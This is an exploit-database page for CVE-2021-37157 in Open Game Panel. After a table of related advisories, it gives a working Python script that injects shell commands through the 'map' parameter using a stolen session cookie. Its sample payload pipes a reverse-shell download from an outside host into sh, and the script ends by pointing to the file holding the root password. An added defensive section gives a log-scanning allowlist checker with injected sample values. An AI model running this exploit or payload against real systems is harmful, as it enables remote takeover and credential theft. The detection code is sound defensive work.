| Title | Published | Views | Family |
|---|---|---|---|
| Open Game Panel - Remote Code Execution (Authenticated) Exploit | 4 Oct 2021 00:00 | – | zdt |
| CVE-2021-37157 | 10 Nov 2021 02:35 | – | circl |
| Open Game Panel security vulnerability | 10 Nov 2021 00:00 | – | cnnvd |
| CVE-2021-37157 | 9 Nov 2021 23:12 | – | cve |
| CVE-2021-37157 | 9 Nov 2021 23:12 | – | cvelist |
| EUVD-2021-23731 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2021-37157 | 10 Nov 2021 00:15 | – | nvd |
| Open Game Panel Remote Code Execution | 4 Oct 2021 00:00 | – | packetstorm |
| Default credentials | 10 Nov 2021 00:15 | – | prion |
| CVE-2021-37157 | 22 May 2025 20:03 | – | redhatcve |

# Exploit Title: Open Game Panel - Remote Code Execution (RCE) (Authenticated)
# Google Dork: intext:"Open Game Panel 2021"
# Date: 08/14/2021
# Exploit Author: prey
# Vendor Homepage: https://www.opengamepanel.org/
# Software Link: https://github.com/OpenGamePanel/OGP-Website
# Version: before 14 Aug patch (https://github.com/OpenGamePanel/OGP-Website/pull/561/commits)
# Tested on: CentOS Linux 5.4.102
# Before the patch, it was possible to inject system commands into the "map" parameter when launching a new
# counter-strike server just by putting the command between ';'. The user needs to be authenticated for this.
import requests
banner = """
## You can get mod_id and home_id from your game panel URL when you are logged in
"""
print(banner)
target = input("Target url: (eg: https://panel.example.org)\n")
opengamepanel_web = input("opengamepanel_web Cookie: (eg: kulonmu5ldu71nmggv2p571nu1)\n")
mod_id = input("Mod_id value: (eg: 2437)\n")
home_id = input("Home_id value: (eg: 3737)\n")
server_ip_port = input("Server IP:port: (eg: 192.168.69.69:42069)\n")
command = input("Payload: (eg: curl https://reverse-shell.sh/1.1.1.1:1337|sh)\n")
url = target + "/home.php?m=gamemanager&p=game_monitor"
cookies = {"opengamepanel_web": opengamepanel_web}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
data = {"mod_id": mod_id, "home_id": home_id, "ip_port": server_ip_port, "map": ";" + command + ";", "start_server": "whatever"}
try:
    # Single authenticated POST; the "map" field carries the injected command
    requests.post(url, headers=headers, cookies=cookies, data=data)
except requests.RequestException:
    print("Something went wrong, check your inputs or try manually exploiting the map parameter")
print("Finished. you can now literally read the file $HOME/OGP/Cfg/Config.pm for the root password yaay! (CVE-2021-37157)")
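
A defender-side check for the injection described above, as an added example that is not part of the original exploit or of OGP's patch: it flags start-server POSTs to `home.php?m=gamemanager&p=game_monitor` whose `map` field falls outside an allowlist. The allowlist pattern, the function names and the record layout (method, URL, urlencoded body taken from a WAF or audit log that captures request bodies) are assumptions, and the sample records are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Assumption: legitimate map names look like "de_dust2" or
# "workshop/125438255/de_dust2"; adjust the alphabet to the games you host.
MAP_ALLOWED = re.compile(r"[A-Za-z0-9_][A-Za-z0-9_./-]{0,63}")

def is_safe_map(value: str) -> bool:
    """Allowlist check: reject anything outside the expected map-name alphabet."""
    return bool(MAP_ALLOWED.fullmatch(value)) and ".." not in value

def is_start_request(method: str, url: str, form: dict) -> bool:
    """True for the request shape the page describes (POST carrying start_server)."""
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    return (method.upper() == "POST"
            and parts.path.endswith("/home.php")
            and query.get("m") == ["gamemanager"]
            and query.get("p") == ["game_monitor"]
            and "start_server" in form)

def flag_requests(records):
    """Return (record_no, map_value) for start requests whose map fails the allowlist.
    records: iterable of (method, url, urlencoded_body) tuples (assumed log layout)."""
    hits = []
    for n, (method, url, body) in enumerate(records, 1):
        form = parse_qs(body, keep_blank_values=True)
        if not is_start_request(method, url, form):
            continue
        for value in form.get("map", []):
            if not is_safe_map(value):
                hits.append((n, value))
    return hits

# Constructed sample records (not real traffic).
SAMPLE = [
    ("POST", "/home.php?m=gamemanager&p=game_monitor",
     "mod_id=2437&home_id=3737&ip_port=192.168.69.69%3A42069&map=de_dust2&start_server=Start"),
    ("POST", "/home.php?m=gamemanager&p=game_monitor",
     "mod_id=2437&home_id=3737&ip_port=192.168.69.69%3A42069&map=%3Bid%3B&start_server=whatever"),
    ("GET", "/home.php?m=gamemanager&p=game_monitor", ""),
    ("POST", "/home.php?m=user_games&p=edit", "map=%3Bid%3B"),
]

if __name__ == "__main__":
    for record_no, value in flag_requests(SAMPLE):
        print(f"record {record_no}: suspicious map value {value!r}")
```

The same `is_safe_map` allowlist can be applied server-side before the value reaches any shell command; rejecting on failure is safer than trying to strip metacharacters.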